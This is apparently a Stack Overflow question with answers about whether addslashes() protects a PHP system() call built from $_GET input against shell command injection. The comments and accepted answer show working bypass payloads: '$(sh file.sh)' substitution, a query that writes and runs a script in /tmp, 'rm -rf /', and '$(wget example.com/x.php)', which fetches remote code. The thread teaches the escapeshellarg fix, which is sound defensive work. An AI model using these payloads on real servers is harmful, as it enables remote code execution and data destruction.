# Using $_GET in system() function - security question

Tags: php, security

So let's say we have a following code:

```
<?php
$str = addslashes($_GET['str']);
$cmd = 'sometool "'.$str.'"';
system($cmd);
?>
```

Is it secure? Can I escape from double quotes somehow? The operating system in linux.

Purely theoretical consideration. I don't use it in my code ;)

Comment: what happen if I send `rm -rf /`with request?

Comment: `$str = htmlspecialchars($_GET['str']);` is much beter. or `htmlentities();`. depends what you want to escape.

Comment: @Dlk that won’t help at all

Comment: @hakiko nothing, because it is considered as a string. This "sometool" is harmless and does nothig with argument.

Comment: Ok, so everyone agrees that it's not secure. But is it really? So how to bypass it? ( ͡° ͜ʖ ͡°)

Comment: @hakiko Question is about how to pass a parameter directly to a program - when done so it is not executed as a command.

Comment: " how to bypass it" : You can restrict your commands. For example, store your available commands in an array and only allow those commands.

Comment: @user2864740 no. question is: Is it secure? Can I escape from double quotes somehow?

Comment: See the notes in https://www.php.net/manual/en/function.system.php - which provides a secure solution (assuming the usage context is itself “secure”)

Comment: Please don't apply random escaping functions, as if text was dangerous by nature. To escape shell arguments you a dedicated function that escapes shell arguments.

Comment: @hakiko Props on a limited literal view and a not-applicable example.

Comment: Without addslashes it can be easily bypassed with using something like ```";some-evil-cmd #``` But when addslashes is applied I dont see how.

Comment: Does this answer your question? [How can I escape quotes on a PHP system call?](https://stackoverflow.com/questions/11331125/how-can-i-escape-quotes-on-a-php-system-call)

Comment: Anyway, have a dup.

Comment: GUYS! I know you should never ever write code like that. But on the other hand, for this particular example I cannot find any example on how to bypass addslashes function to somehow put my own evil-cmd there. And yes, I read the manual...

Comment: such GET request : `?str="; do what I want; "`

Comment: see what you get with on such page `<?php
header("Content-Type: text/plain");
$cmd = 'sometool "'. addslashes($_GET['str']) .'"';
echo $cmd . PHP_EOL;
$cmd = 'sometool "'. escapeshellarg($_GET['str']) .'"';
echo $cmd . PHP_EOL;
$cmd = 'sometool "'. htmlspecialchars($_GET['str']) .'"';
echo $cmd . PHP_EOL;
?>`

Answer (score 3, accepted):

It's not secure. You can still pass some arguments that will be malicious, i.e. execute other files in system.

```
$var = '$(sh file.sh)';
$str = addslashes($var);
$cmd = 'sometool "'.$str.'"';
system($cmd);
```

You should use [`escapeshellarg`](https://www.php.net/escapeshellarg) method for escaping shell arguments.

```
$str = escapeshellarg($_GET['str']);
$cmd = 'sometool ' . $str;
system($cmd);
```

Note that you have to use the argument `$str` as it is and that it will be a single argument. You must not surround it with quotes `'` or double quotes `"`

Comment: I'm not asking how to secure it but how to bypass "security" from provided example.

Comment: ok, thats clever. I'm accepting your answer cause you actually can do something in the system so in a way you escaped from double quotes :)

Comment: such query let you see it is not so safe `?str="; \`echo "ls -rtl" > /tmp/myfile.ksh; chmod 777 /tmp/myfile.ksh\`; /tmp/myfile.ksh; date; "`

Comment: the previous query let you see it is not so safe to keep the double quotes  `"`  to surround `$str`

Comment: @Tajniak It was before I see the update without double quotes. and know it is blocked for 15min. I will try to upvote a bit later (if I can't find any workaround ;) )

Comment: i think $(wget example.com/x.php) is enough to do whatever we want :)

Answer (score 2):

Definitively not secure as is,

Like any user's input, you'll have to not only escape quotes, but also verify the conformity of the data being submitted and have to be strict on that.

For e.g.: if the "sometool" command is waiting for a path, you've to ensure that the user input is a valid path. If the path has to be in a restricted location, you've to check that restriction.

Assuming that your "str" has to be a valid string, you can begin with the filter input function.

https://www.php.net/manual/en/function.filter-input.php

Make sure to use the appropriate filters (for quotes, encoding, etc.) :  https://www.php.net/manual/en/filter.filters.php.

It will not be possible to by-pass the escaping here.

This somehow ensure the conformity of the data, but still, you've to be sure that the command "sometool" itself will not be affected by any valid string characters or syntax, that's what makes it still unsecure to use.

Comment: Ok, so assuming that "sometool" does nothing with provided argument, you cannot do anything malicious with it. Thats the answer I was looking for :)

Comment: the problem is not sometool, but what you can append to the command to execute